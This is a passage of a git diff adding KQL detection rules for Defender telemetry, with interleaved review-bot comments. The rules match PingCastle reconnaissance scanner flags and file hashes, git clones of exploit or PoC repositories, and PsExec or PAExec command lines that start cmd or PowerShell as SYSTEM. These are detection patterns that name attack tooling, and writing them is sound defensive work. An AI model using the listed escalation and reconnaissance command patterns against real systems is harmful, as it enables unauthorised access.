startswith "7be77c885d0c9a4af4cecc64d512987cf93ba937" or SHA1 startswith "72dbb719b05f89d9d2dbdf186714caf7639daa36" or SHA1 startswith "5b1498beb2cfb4d971e377801e7abce62c0e315b" or SHA1 startswith "292629c6ab33bddf123d26328025e2d157d9e8fc" or SHA1 startswith "be59e621e83a2d4c87b0e6c69a2d22f175408b11" or SHA1 startswith "0250ce9a716ab8cca1c70a9de4cbc49a51934995" or SHA1 startswith "607e1fa810c799735221a609af3bfc405728c02d" or SHA1 startswith "ab1c547f6d1c07a9e0a01e46adea3aae1cac12e3" or SHA1 startswith "044cf5698a8e6b0aeba5acb56567f06366a9a70a" or SHA1 startswith "ef2dea8c736d49607832986c6c2d6fdd68ba6491" or SHA1 startswith "efffc2bfb8af2e3242233db9a7109b903fc3f178" or SHA1 startswith "5a05d4320de9afbc84de8469dd02b3a109efb2d4" or SHA1 startswith "a785d88cf8b862a420b9be793ee6a9616aa94c84" or SHA1 startswith "5688d56cbaf0d934c4e37b112ba257e8fb63f4ea" or SHA1 startswith "5cd2ada1c26815fbfd6a0cd746d5d429c0d83a17" or 
SHA1 startswith "81d67b3d70c4e855cb11a453cc32997517708362" or SHA1 startswith "9cffce9de95e0109f4dfecce0ab2cb0a59cc58ad" or SHA1 startswith "09c6930d057f49c1c1e11cf9241fffc8c12df3a2" or SHA1 startswith "e27bf7db8d96db9d4c8a06ee5e9b8e9fcb86ac92" or SHA1 startswith "9e3c992415e390f9ada4d15c693b687f38a492d1" or SHA1 startswith "3f34a5ee303d37916584c888c4928e1c1164f92a" or SHA1 startswith "ea4c8c56a8f5c90a4c08366933e5fb2de611d0db" or SHA1 startswith "3150f14508ee4cae19cf09083499d1cda8426540" or SHA1 startswith "036ad9876fa552b1298c040e233d620ea44689c6" or SHA1 startswith "3a3c1dcb146bb4616904157344ce1a82cd173bf5" or SHA1 startswith "6230d6fca973fa26188dfbadede57afb4c15f75c" or SHA1 startswith "8f7b2a9b8842f339b1e33602b7f926ab65de1a4d" or SHA1 startswith "a586bb06b59a4736a47abff8423a54fe8e2c05c4" or SHA1 startswith "c82152cddf9e5df49094686531872ecd545976db" or SHA1 startswith "04c39ffc18533100aaa4f9c06baf2c719ac94a61" or SHA1 startswith "e082affa5cdb2d46452c6601a9e85acb8446b836" or SHA1 startswith "a075bfb6cf5c6451ce682197a87277c8bc188719" or SHA1 startswith "34c0c5839af1c92bce7562b91418443a2044c90d" or SHA1 startswith "74e10a9989e0ec8fe075537ac802bd3031ae7e08" or SHA1 startswith "3a515551814775df0ccbe09f219bc972eae45a10") or (SHA256 startswith "90fd5b855b5107e7abaaefb6e658f50d5d6e08ac28e35f31d8b03dcabf77872b" or SHA256 startswith "5836c24f233f77342fee825f3cad73caab7ab4fb65ec2aec309fd12bc1317e85" or SHA256 startswith "e850e54b12331249c357a20604281b9abf8a91e6f3d957463fc625e6b126ef03" or SHA256 startswith "9e752f29edcd0db9931c20b173eee8d4d8196f87382c68a6e7eb4c8a44d58795" or SHA256 startswith "7a8c127d6c41f80d178d2315ed2f751ac91b1cd54d008af13680e04f068f426f" or SHA256 startswith "9f65e1c142c4f814e056a197a2241fd09e09acf245c62897109871137321a72a" or SHA256 startswith "c9b52d03c66d54d6391c643b3559184b1425c84a372081ec2bfed07ebf6af275" or SHA256 startswith "1b96f6218498aa6baf6f6c15b8f99e542077e33feb1ab5472bbbf7d4de43eb6b" or SHA256 startswith 
"768021fc242054decc280675750dec0a9e74e764b8646864c58756fa2386d2a2" or SHA256 startswith "1e1b32bef31be040f0f038fcb5a2d68fb192daaef23c6167f91793d21e06ebae" or SHA256 startswith "606bd75ed9d2d6107ea7ee67063d1761a99f2fb5e932c8344d11395d24587dd6" or SHA256 startswith "b489d3cdd158f040322ae5c8d0139ad28eff743c738a10f2d0255c7e149bd92a" or SHA256 startswith "ca7ecf04a8ad63aff330492c15270d56760cb223a607cdb1431fb00e1b9985d1" or SHA256 startswith "9dc4fca72463078b70f6516559a179c78400b06534e63ee12fb38adbe2632559" or SHA256 startswith "c00d2aee59bac087d769e09b5b7f832176f7714fefdc6af2502e6031e3eb37c2" or SHA256 startswith "a8e96d564687064190eaf865774f773def05fdbf651aa5bbf66216c077b863ef" or SHA256 startswith "84ed328cee2a0505e87662faf6fc57915e3a831c97ee88ad691f5c63522e139d" or SHA256 startswith "c143de99c57965d3a44c1fce6a97c2773b050609c1ea7f45688a4ca2422a5524" or SHA256 startswith "01d1efd5e552c59baa70c0778902233c05fde7de6e5cc156c62607df0804d36b" or SHA256 startswith "9a8dfeb7e3174f3510691e2b32d0f9088e0ed67d9ed1b2afbe450d70dec2016b" or SHA256 startswith "63b92a114075d855f706979d50ed3460fe39f8a2f5498b7657f0d14865117629" or SHA256 startswith "2eb014130ff837b6481c26f0d0152f84de22ca7370b15a4f51921e0054a2a358" or SHA256 startswith "7d5bb4271bf8ca2b63a59e731f3ec831dbda53adb8e28665e956afb4941f32ca" or SHA256 startswith "e57098a75bf32e127c214b61bfba492d6b209e211f065fcc84ff10637a2143ea" or SHA256 startswith "dd14dbcdbcfcf4bc108a926b9667af4944a3b6faf808cf1bb9a3a2554722e172" or SHA256 startswith "dca2b1b824cb28bd15577eace45bde7ff8f8f44705b17085524659de31761de4" or SHA256 startswith "8b95f339a07d59a8c8d8580283dffb9e8dfabdeb9171e42c948ab68c71afe7f2" or SHA256 startswith "5428a840fab6ac4a0ecb2fc20dbc5f928432b00b9297dd1cb6e69336f44eba66" or SHA256 startswith "e2517ae0fccaa4aefe039026a4fc855964f0c2a5f84177140200b0e58ddbfd27" or SHA256 startswith "75d05880de2593480254181215dd9a0075373876f2f4a2a4a9a654b2e0729a41" or SHA256 startswith 
"56490e14ce3817c3a1ddc0d97b96e90d6351bcd29914e7c9282f6a998cca84b1" or SHA256 startswith "f25d0a5e77e4ed9e7c4204a33cfc8e46281b43adbee550b15701dd00f41bdbe0" or SHA256 startswith "845a5fdcbb08e7efa7e0eabfcd881c9eebc0eec0a3a2f8689194e6b91b6eeaf8" or SHA256 startswith "9a89e6652e563d26a3f328ba23d91f464c9549da734557c5a02559df24b2700d" or SHA256 startswith "5614f2bc9b2ed414aab2c5c7997bdcbe8236e67ced8f91a63d1b6cfbe6e08726" or SHA256 startswith "37bf92dcedb47a90d8d38ebda8d8dd168ef5803dcb01161f8cf6d68b70d49d90" or SHA256 startswith "ec8590f91f5cc21e931c57345425f0625a6e37dfba026b222260450de40459f5" or SHA256 startswith "3994eb72b1c227c593e14b8cad7001de11d1c247d4fbf84d0714bb8a17853140" or SHA256 startswith "d654f870436d63c9d8e4390d9d4d898abdf0456736c7654d71cdf81a299c3f87" or SHA256 startswith "63fbfabd4d8afb497dee47d112eb9d683671b75a8bf6407c4bd5027fd211b892" or SHA256 startswith "47028053f05188e6a366fff19bedbcad2bc4daba8ff9e4df724b77d0181b7054" or SHA256 startswith "7c1b1e8c880a30c43b3a52ee245f963a977e1f40284f4b83f4b9afe3821753dd")) or FolderPath endswith "\\PingCastle.exe" or ProcessVersionInfoOriginalFileName =~ "PingCastle.exe" or ProcessVersionInfoProductName =~ "Ping Castle" or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" 
or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")
\ No newline at end of file
diff --git a/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql b/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql
new file mode 100644
index 00000000..2e92ce4e
--- /dev/null
+++ b/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql
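Review bot: The hash predicate on the `| where` line of pua_pingcastle_execution.kql spells out roughly a hundred `MD5 startswith` / `SHA1 startswith` / `SHA256 startswith` clauses, each against a full-length digest; `startswith` on a complete hash is an equality test in disguise, and the flat `or` chain is hard to audit for a stale or mistyped entry. The rest of this patch already uses the list form (`RegistryValueData in~ (...)` in wow6432node_currentversion_autorun_keys_modification.kql), so for consistency and readability the three groups should become `MD5 in~ ("f741f25ac909ee434e50812d436c73ff", ...)`, `SHA1 in~ (...)` and `SHA256 in~ (...)`, which keeps the case-insensitive comparison. Since the same shape presumably comes out of the converter for every Sigma hash list, the change belongs in the generator rather than in this one file.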
@@ -0,0 +1,11 @@
+// Title: PUA - PingCastle Execution From Potentially Suspicious Parent
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2024-01-11
+// Level: high
+// Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location.
+
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1595
+
+DeviceProcessEvents
+| where ((InitiatingProcessCommandLine contains ".bat" or InitiatingProcessCommandLine contains ".chm" or InitiatingProcessCommandLine contains ".cmd" or InitiatingProcessCommandLine contains ".hta" or InitiatingProcessCommandLine contains ".htm" or InitiatingProcessCommandLine contains ".html" or InitiatingProcessCommandLine contains ".js" or InitiatingProcessCommandLine contains ".lnk" or InitiatingProcessCommandLine contains ".ps1" or InitiatingProcessCommandLine contains ".vbe" or InitiatingProcessCommandLine contains ".vbs" or InitiatingProcessCommandLine contains ".wsf") or (InitiatingProcessCommandLine contains ":\\Perflogs\\" or InitiatingProcessCommandLine contains ":\\Temp\\" or InitiatingProcessCommandLine contains ":\\Users\\Public\\" or InitiatingProcessCommandLine contains ":\\Windows\\Temp\\" or InitiatingProcessCommandLine contains "\\AppData\\Local\\Temp" or InitiatingProcessCommandLine contains "\\AppData\\Roaming\\" or InitiatingProcessCommandLine contains "\\Temporary Internet") or ((InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favorites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favourites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Contacts\\"))) and (InitiatingProcessCommandLine contains ".bat" or InitiatingProcessCommandLine contains ".chm" or InitiatingProcessCommandLine 
contains ".cmd" or InitiatingProcessCommandLine contains ".hta" or InitiatingProcessCommandLine contains ".htm" or InitiatingProcessCommandLine contains ".html" or InitiatingProcessCommandLine contains ".js" or InitiatingProcessCommandLine contains ".lnk" or InitiatingProcessCommandLine contains ".ps1" or InitiatingProcessCommandLine contains ".vbe" or InitiatingProcessCommandLine contains ".vbs" or InitiatingProcessCommandLine contains ".wsf") and (FolderPath endswith "\\PingCastle.exe" or ProcessVersionInfoOriginalFileName =~ "PingCastle.exe" or ProcessVersionInfoProductName =~ "Ping Castle" or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server "))
\ No newline at end of file
diff --git a/KQL/rules/Reconnaissance/suspicious_git_clone.kql b/KQL/rules/Reconnaissance/suspicious_git_clone.kql
new file mode 100644
index 00000000..f8589ab0
--- /dev/null
+++ b/KQL/rules/Reconnaissance/suspicious_git_clone.kql
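Review bot: The parent filter in the `| where` clause is redundant in a way that silently disables the path checks: the first group `(script extensions or temp/public paths or Users\Favorites|Favourites|Contacts)` is ANDed with the same script-extension list again, so the whole expression reduces to `extensions and PingCastle`, and a parent launched from `:\Temp\` or `\AppData\Roaming\` without one of the listed extensions never matches. If the intent behind "potentially suspicious parent" is a script file *in* an uncommon location, the first group should hold only the path clauses; if the extension list alone is intended, the path clauses should be removed rather than left dead. I cannot tell from the hunk which reading the Sigma source meant, so a one-line comment above the query, e.g. `// Parent must reference a script file located in a temp or user-writable path`, would pin the intent and stop a later converter pass from reintroducing the duplicate.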
@@ -0,0 +1,10 @@
+// Title: Suspicious Git Clone
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-03
+// Level: medium
+// Description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1593.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " clone " or ProcessCommandLine contains "git-remote-https ") and ((FolderPath endswith "\\git.exe" or FolderPath endswith "\\git-remote-https.exe") or ProcessVersionInfoOriginalFileName =~ "git.exe") and (ProcessCommandLine contains "exploit" or ProcessCommandLine contains "Vulns" or ProcessCommandLine contains "vulnerability" or ProcessCommandLine contains "RemoteCodeExecution" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "CVE-" or ProcessCommandLine contains "poc-" or ProcessCommandLine contains "ProofOfConcept" or ProcessCommandLine contains "proxyshell" or ProcessCommandLine contains "log4shell" or ProcessCommandLine contains "eternalblue" or ProcessCommandLine contains "eternal-blue" or ProcessCommandLine contains "MS17-")
\ No newline at end of file
diff --git a/KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql b/KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql
new file mode 100644
index 00000000..1fcb54bb
--- /dev/null
+++ b/KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql
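Review bot: The keyword list in the `| where` clause drifts from the Linux variant of the same rule in the next hunk (`suspicious_git_clone_linux.kql`): that one also matches `RCE`, this one does not, and nothing records why the two differ. Either bring them in line or document the choice with a comment above the query, e.g. `// "RCE" deliberately omitted: case-insensitive contains would also match "source", "force", "commerce"`. The description header is also worth tightening while the file is new — "that contain suspicious keywords which might be suspicious" could read `Detects "git clone" of a remote repository whose URL contains exploit- or PoC-related keywords`.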
@@ -0,0 +1,10 @@
+// Title: Suspicious Git Clone - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-03
+// Level: medium
+// Description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1593.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " clone " and FolderPath endswith "/git") and (ProcessCommandLine contains "exploit" or ProcessCommandLine contains "Vulns" or ProcessCommandLine contains "vulnerability" or ProcessCommandLine contains "RCE" or ProcessCommandLine contains "RemoteCodeExecution" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "CVE-" or ProcessCommandLine contains "poc-" or ProcessCommandLine contains "ProofOfConcept" or ProcessCommandLine contains "proxyshell" or ProcessCommandLine contains "log4shell" or ProcessCommandLine contains "eternalblue" or ProcessCommandLine contains "eternal-blue" or ProcessCommandLine contains "MS17-")
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/creation_of_a_diagcab.kql b/KQL/rules/Resource Development/creation_of_a_diagcab.kql
new file mode 100644
index 00000000..9806f518
--- /dev/null
+++ b/KQL/rules/Resource Development/creation_of_a_diagcab.kql
@@ -0,0 +1,12 @@
+// Title: Creation of a Diagcab
+// Author: frack113
+// Date: 2022-06-08
+// Level: medium
+// Description: Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development
+// False Positives:
+// - Legitimate microsoft diagcab
+
+DeviceFileEvents
+| where FolderPath endswith ".diagcab"
\ No newline at end of file
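Review bot: `ProcessCommandLine contains "RCE"` is case-insensitive in KQL, so it also matches any clone URL containing "source", "force", "sourceforge", "commerce" and the like, which makes it by far the noisiest term in the list; the Windows variant in the preceding hunk omits it, presumably for that reason. If the acronym is wanted, anchor it and keep it case-sensitive with `ProcessCommandLine matches regex @"\bRCE\b"` (Kusto's regex matching is case-sensitive by default), otherwise drop the term so the two rules agree. `RemoteCodeExecution` already covers the spelled-out form.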
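Review bot: The `| where` clause has no `ActionType` filter, so this rule fires on every `DeviceFileEvents` row for a `.diagcab` path — modification, rename and deletion included — although the title and description are about creation. Restrict it to the creation event and test the file name directly, which is the unambiguous column in this table: `| where ActionType == "FileCreated" and FileName endswith ".diagcab"`. If `FolderPath` is kept, add a comment stating that this backend populates it with the full path including the file name; the schema documents it as the containing folder, so a reader cannot assume that.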
diff --git a/KQL/rules/Resource Development/hacktool_purplesharp_execution.kql b/KQL/rules/Resource Development/hacktool_purplesharp_execution.kql
new file mode 100644
index 00000000..2f2efedc
--- /dev/null
+++ b/KQL/rules/Resource Development/hacktool_purplesharp_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - PurpleSharp Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-06-18
+// Level: critical
+// Description: Detects the execution of the PurpleSharp adversary simulation tool
+// MITRE Tactic: Resource Development
+// Tags: attack.t1587, attack.resource-development
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "xyz123456.exe" or ProcessCommandLine contains "PurpleSharp") or (FolderPath contains "\\purplesharp" or ProcessVersionInfoOriginalFileName =~ "PurpleSharp.exe")
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/hybridconnectionmanager_service_installation_registry.kql b/KQL/rules/Resource Development/hybridconnectionmanager_service_installation_registry.kql
new file mode 100644
index 00000000..d51376c7
--- /dev/null
+++ b/KQL/rules/Resource Development/hybridconnectionmanager_service_installation_registry.kql
@@ -0,0 +1,10 @@
+// Title: HybridConnectionManager Service Installation - Registry
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2021-04-12
+// Level: high
+// Description: Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1608
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Services\\HybridConnectionManager" or (RegistryValueData contains "Microsoft.HybridConnectionManager.Listener.exe" and ActionType =~ "RegistryValueSet")
\ No newline at end of file
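Review bot: The first alternative in the `| where` clause, `RegistryKey contains "\\Services\\HybridConnectionManager"`, carries no `ActionType` restriction while the second one is limited to `RegistryValueSet`, so key deletion and every other registry event on that path — including the service being uninstalled — also raises this `high`-level "installation" alert. Restrict it to the events that represent an install, e.g. `(ActionType in ("RegistryKeyCreated", "RegistryValueSet") and RegistryKey contains "\\Services\\HybridConnectionManager")`. If firing on removal is intentional, a comment on the line saying so would keep the next reader from "fixing" it.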
diff --git a/KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql b/KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql
new file mode 100644
index 00000000..b7515c03
--- /dev/null
+++ b/KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql
@@ -0,0 +1,13 @@
+// Title: Potential Execution of Sysinternals Tools
+// Author: Markus Neis
+// Date: 2017-08-28
+// Level: low
+// Description: Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+// - Legitimate use of SysInternals tools
+// - Programs that use the same command line flag
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -accepteula" or ProcessCommandLine contains " /accepteula" or ProcessCommandLine contains " –accepteula" or ProcessCommandLine contains " —accepteula" or ProcessCommandLine contains " ―accepteula"
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql b/KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql
new file mode 100644
index 00000000..9c262e44
--- /dev/null
+++ b/KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql
@@ -0,0 +1,13 @@ +// Title: Potential Privilege Escalation To LOCAL SYSTEM +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-05-22 +// Level: high +// Description: Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001 +// False Positives: +// - Weird admins that rename their tools +// - Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing + +DeviceProcessEvents +| where (ProcessCommandLine contains " -s cmd" or ProcessCommandLine contains " /s cmd" or ProcessCommandLine contains " –s cmd" or ProcessCommandLine contains " —s cmd" or ProcessCommandLine contains " ―s cmd" or ProcessCommandLine contains " -s -i cmd" or ProcessCommandLine contains " -s /i cmd" or ProcessCommandLine contains " -s –i cmd" or ProcessCommandLine contains " -s —i cmd" or ProcessCommandLine contains " -s ―i cmd" or ProcessCommandLine contains " /s -i cmd" or ProcessCommandLine contains " /s /i cmd" or ProcessCommandLine contains " /s –i cmd" or ProcessCommandLine contains " /s —i cmd" or ProcessCommandLine contains " /s ―i cmd" or ProcessCommandLine contains " –s -i cmd" or ProcessCommandLine contains " –s /i cmd" or ProcessCommandLine contains " –s –i cmd" or ProcessCommandLine contains " –s —i cmd" or ProcessCommandLine contains " –s ―i cmd" or ProcessCommandLine contains " —s -i cmd" or ProcessCommandLine contains " —s /i cmd" or ProcessCommandLine contains " —s –i cmd" or ProcessCommandLine contains " —s —i cmd" or ProcessCommandLine contains " —s ―i cmd" or ProcessCommandLine contains " ―s -i cmd" or ProcessCommandLine contains " ―s /i cmd" or ProcessCommandLine contains " ―s –i cmd" or ProcessCommandLine contains " ―s —i cmd" or ProcessCommandLine contains " ―s ―i cmd" or ProcessCommandLine contains " -i 
-s cmd" or ProcessCommandLine contains " -i /s cmd" or ProcessCommandLine contains " -i –s cmd" or ProcessCommandLine contains " -i —s cmd" or ProcessCommandLine contains " -i ―s cmd" or ProcessCommandLine contains " /i -s cmd" or ProcessCommandLine contains " /i /s cmd" or ProcessCommandLine contains " /i –s cmd" or ProcessCommandLine contains " /i —s cmd" or ProcessCommandLine contains " /i ―s cmd" or ProcessCommandLine contains " –i -s cmd" or ProcessCommandLine contains " –i /s cmd" or ProcessCommandLine contains " –i –s cmd" or ProcessCommandLine contains " –i —s cmd" or ProcessCommandLine contains " –i ―s cmd" or ProcessCommandLine contains " —i -s cmd" or ProcessCommandLine contains " —i /s cmd" or ProcessCommandLine contains " —i –s cmd" or ProcessCommandLine contains " —i —s cmd" or ProcessCommandLine contains " —i ―s cmd" or ProcessCommandLine contains " ―i -s cmd" or ProcessCommandLine contains " ―i /s cmd" or ProcessCommandLine contains " ―i –s cmd" or ProcessCommandLine contains " ―i —s cmd" or ProcessCommandLine contains " ―i ―s cmd" or ProcessCommandLine contains " -s pwsh" or ProcessCommandLine contains " /s pwsh" or ProcessCommandLine contains " –s pwsh" or ProcessCommandLine contains " —s pwsh" or ProcessCommandLine contains " ―s pwsh" or ProcessCommandLine contains " -s -i pwsh" or ProcessCommandLine contains " -s /i pwsh" or ProcessCommandLine contains " -s –i pwsh" or ProcessCommandLine contains " -s —i pwsh" or ProcessCommandLine contains " -s ―i pwsh" or ProcessCommandLine contains " /s -i pwsh" or ProcessCommandLine contains " /s /i pwsh" or ProcessCommandLine contains " /s –i pwsh" or ProcessCommandLine contains " /s —i pwsh" or ProcessCommandLine contains " /s ―i pwsh" or ProcessCommandLine contains " –s -i pwsh" or ProcessCommandLine contains " –s /i pwsh" or ProcessCommandLine contains " –s –i pwsh" or ProcessCommandLine contains " –s —i pwsh" or ProcessCommandLine contains " –s ―i pwsh" or ProcessCommandLine contains " —s -i pwsh" or 
ProcessCommandLine contains " —s /i pwsh" or ProcessCommandLine contains " —s –i pwsh" or ProcessCommandLine contains " —s —i pwsh" or ProcessCommandLine contains " —s ―i pwsh" or ProcessCommandLine contains " ―s -i pwsh" or ProcessCommandLine contains " ―s /i pwsh" or ProcessCommandLine contains " ―s –i pwsh" or ProcessCommandLine contains " ―s —i pwsh" or ProcessCommandLine contains " ―s ―i pwsh" or ProcessCommandLine contains " -i -s pwsh" or ProcessCommandLine contains " -i /s pwsh" or ProcessCommandLine contains " -i –s pwsh" or ProcessCommandLine contains " -i —s pwsh" or ProcessCommandLine contains " -i ―s pwsh" or ProcessCommandLine contains " /i -s pwsh" or ProcessCommandLine contains " /i /s pwsh" or ProcessCommandLine contains " /i –s pwsh" or ProcessCommandLine contains " /i —s pwsh" or ProcessCommandLine contains " /i ―s pwsh" or ProcessCommandLine contains " –i -s pwsh" or ProcessCommandLine contains " –i /s pwsh" or ProcessCommandLine contains " –i –s pwsh" or ProcessCommandLine contains " –i —s pwsh" or ProcessCommandLine contains " –i ―s pwsh" or ProcessCommandLine contains " —i -s pwsh" or ProcessCommandLine contains " —i /s pwsh" or ProcessCommandLine contains " —i –s pwsh" or ProcessCommandLine contains " —i —s pwsh" or ProcessCommandLine contains " —i ―s pwsh" or ProcessCommandLine contains " ―i -s pwsh" or ProcessCommandLine contains " ―i /s pwsh" or ProcessCommandLine contains " ―i –s pwsh" or ProcessCommandLine contains " ―i —s pwsh" or ProcessCommandLine contains " ―i ―s pwsh" or ProcessCommandLine contains " -s powershell" or ProcessCommandLine contains " /s powershell" or ProcessCommandLine contains " –s powershell" or ProcessCommandLine contains " —s powershell" or ProcessCommandLine contains " ―s powershell" or ProcessCommandLine contains " -s -i powershell" or ProcessCommandLine contains " -s /i powershell" or ProcessCommandLine contains " -s –i powershell" or ProcessCommandLine contains " -s —i powershell" or ProcessCommandLine 
contains " -s ―i powershell" or ProcessCommandLine contains " /s -i powershell" or ProcessCommandLine contains " /s /i powershell" or ProcessCommandLine contains " /s –i powershell" or ProcessCommandLine contains " /s —i powershell" or ProcessCommandLine contains " /s ―i powershell" or ProcessCommandLine contains " –s -i powershell" or ProcessCommandLine contains " –s /i powershell" or ProcessCommandLine contains " –s –i powershell" or ProcessCommandLine contains " –s —i powershell" or ProcessCommandLine contains " –s ―i powershell" or ProcessCommandLine contains " —s -i powershell" or ProcessCommandLine contains " —s /i powershell" or ProcessCommandLine contains " —s –i powershell" or ProcessCommandLine contains " —s —i powershell" or ProcessCommandLine contains " —s ―i powershell" or ProcessCommandLine contains " ―s -i powershell" or ProcessCommandLine contains " ―s /i powershell" or ProcessCommandLine contains " ―s –i powershell" or ProcessCommandLine contains " ―s —i powershell" or ProcessCommandLine contains " ―s ―i powershell" or ProcessCommandLine contains " -i -s powershell" or ProcessCommandLine contains " -i /s powershell" or ProcessCommandLine contains " -i –s powershell" or ProcessCommandLine contains " -i —s powershell" or ProcessCommandLine contains " -i ―s powershell" or ProcessCommandLine contains " /i -s powershell" or ProcessCommandLine contains " /i /s powershell" or ProcessCommandLine contains " /i –s powershell" or ProcessCommandLine contains " /i —s powershell" or ProcessCommandLine contains " /i ―s powershell" or ProcessCommandLine contains " –i -s powershell" or ProcessCommandLine contains " –i /s powershell" or ProcessCommandLine contains " –i –s powershell" or ProcessCommandLine contains " –i —s powershell" or ProcessCommandLine contains " –i ―s powershell" or ProcessCommandLine contains " —i -s powershell" or ProcessCommandLine contains " —i /s powershell" or ProcessCommandLine contains " —i –s powershell" or ProcessCommandLine contains " 
—i —s powershell" or ProcessCommandLine contains " —i ―s powershell" or ProcessCommandLine contains " ―i -s powershell" or ProcessCommandLine contains " ―i /s powershell" or ProcessCommandLine contains " ―i –s powershell" or ProcessCommandLine contains " ―i —s powershell" or ProcessCommandLine contains " ―i ―s powershell") and (not((ProcessCommandLine contains "paexec" or ProcessCommandLine contains "PsExec" or ProcessCommandLine contains "accepteula")))
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/potential_psexec_remote_execution.kql b/KQL/rules/Resource Development/potential_psexec_remote_execution.kql
new file mode 100644
index 00000000..5e52c28e
--- /dev/null
+++ b/KQL/rules/Resource Development/potential_psexec_remote_execution.kql
@@ -0,0 +1,10 @@
+// Title: Potential PsExec Remote Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-28
+// Level: high
+// Description: Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "accepteula" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " \\\\") and (not((ProcessCommandLine contains "\\\\localhost" or ProcessCommandLine contains "\\\\127.")))
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql b/KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql
new file mode 100644
index 00000000..ca3b3936
--- /dev/null
+++ b/KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql
